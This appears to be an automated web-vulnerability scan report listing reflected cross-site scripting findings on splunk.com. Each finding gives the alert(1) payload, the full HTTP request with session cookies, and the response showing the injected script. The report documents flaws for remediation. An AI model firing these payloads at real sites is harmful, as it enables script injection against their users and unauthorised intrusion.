GET /b1745--><script>alert(1)</script>cb09324f9b0/ HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.368. http://www.splunk.com/base/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /base/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f613d'-alert(1)-'b85c464f7a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /base/?f613d'-alert(1)-'b85c464f7a2=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]...
var versionIndex = document.getElementById('docsVersionSelect').selectedIndex; var version = document.getElementById('docsVersionSelect')[versionIndex].value; var title = 'base/Documentation?f613d'-alert(1)-'b85c464f7a2=1'; sajax_do_call( 'efSplunkAjaxChangeVersion', [version,title], AjaxChangeVersion_callback ); //window.location.href = "/base/Documentation?f613d'-alert(1)-'b85c464f7a2=1"; }
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30614'-alert(1)-'db61a98f369 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /base30614'-alert(1)-'db61a98f369/Documentation HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... geVersion( ) { var versionIndex = document.getElementById('docsVersionSelect').selectedIndex; var version = document.getElementById('docsVersionSelect')[versionIndex].value; var title = 'base30614'-alert(1)-'db61a98f369/Documentation'; sajax_do_call( 'efSplunkAjaxChangeVersion', [version,title], AjaxChangeVersion_callback ); //window.location.href = "/base30614'-alert(1)-'db61a98f369/Documentation"; }
The value of REST URL parameter 1 is copied into an HTML comment. The payload c69a9--><script>alert(1)</script>dfef5875393 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /c69a9--><script>alert(1)</script>dfef5875393/Documentation HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:15:36 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: d74ef12050057023258dc4316660863a1297008936 Last-Modified: Sun, 06 Feb 2011 16:15:36 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18327
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eab6"><script>alert(1)</script>2a194ea043b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /base3eab6"><script>alert(1)</script>2a194ea043b/Documentation HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/base3eab6"><script>alert(1)</script>2a194ea043b/Documentation"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a265e"><script>alert(1)</script>82196131638 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /base/Documentationa265e"><script>alert(1)</script>82196131638 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/base/Documentationa265e"><script>alert(1)</script>82196131638"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2011f'-alert(1)-'35a486ae68e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /base/Documentation2011f'-alert(1)-'35a486ae68e HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]...
var versionIndex = document.getElementById('docsVersionSelect').selectedIndex; var version = document.getElementById('docsVersionSelect')[versionIndex].value; var title = 'base/Documentation2011f'-alert(1)-'35a486ae68e'; sajax_do_call( 'efSplunkAjaxChangeVersion', [version,title], AjaxChangeVersion_callback ); //window.location.href = "/base/Documentation2011f'-alert(1)-'35a486ae68e"; }
</script> ...[SNIP]...
4.374. http://www.splunk.com/base/Documentation [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /base/Documentation
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 445e3"><script>alert(1)</script>1d005539fca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /base/Documentation?445e3"><script>alert(1)</script>1d005539fca=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/base/Documentation?445e3"><script>alert(1)</script>1d005539fca=1"> ...[SNIP]...
4.375. http://www.splunk.com/base/Documentation [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /base/Documentation
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68caf'-alert(1)-'d4cdb67b19d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /base/Documentation?68caf'-alert(1)-'d4cdb67b19d=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]...
var versionIndex = document.getElementById('docsVersionSelect').selectedIndex; var version = document.getElementById('docsVersionSelect')[versionIndex].value; var title = 'base/Documentation?68caf'-alert(1)-'d4cdb67b19d=1'; sajax_do_call( 'efSplunkAjaxChangeVersion', [version,title], AjaxChangeVersion_callback ); //window.location.href = "/base/Documentation?68caf'-alert(1)-'d4cdb67b19d=1"; }
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cce9"><script>alert(1)</script>e7165443f5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /base8cce9"><script>alert(1)</script>e7165443f5e/Documentation/4.1.6/ReleaseNotes/4.1.6 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/base8cce9"><script>alert(1)</script>e7165443f5e/Documentation/4.1.6/ReleaseNotes/4.1.6"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 615a6--><script>alert(1)</script>518ba201284 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /615a6--><script>alert(1)</script>518ba201284/Documentation/4.1.6/ReleaseNotes/4.1.6 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22f49'-alert(1)-'27f5c74605b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /base22f49'-alert(1)-'27f5c74605b/Documentation/4.1.6/ReleaseNotes/4.1.6 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
